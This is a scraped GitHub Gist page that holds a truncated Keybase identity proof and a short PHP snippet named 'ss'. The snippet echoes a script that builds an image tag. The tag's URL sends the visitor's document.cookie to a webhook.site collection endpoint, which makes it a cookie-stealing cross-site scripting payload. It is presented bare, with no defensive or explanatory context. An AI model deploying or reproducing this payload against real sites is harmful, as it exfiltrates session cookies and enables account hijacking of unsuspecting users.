Skip to content

Instantly share code, notes, and snippets.

### Keybase proof
I hereby claim:
* I am olexandrch on github.
* I am alexch (https://keybase.io/alexch) on keybase.
* I have a public key ASA1iYIU0NUxHhsBhn36Y2FniSH-bMQewuDrzlkB6fWYoAo
To claim this, I am signing this object:
@olexandrch
olexandrch / ss
Last active August 20, 2019 04:22
<?php
$html = <<<EOF
<script>
document.write('<img src="https://webhook.site/b1302a34-bee4-493f-b3ed-06539ce82117?cookie='+(document.cookie||"none")+'" />');
</script>
EOF;
echo $html;
?>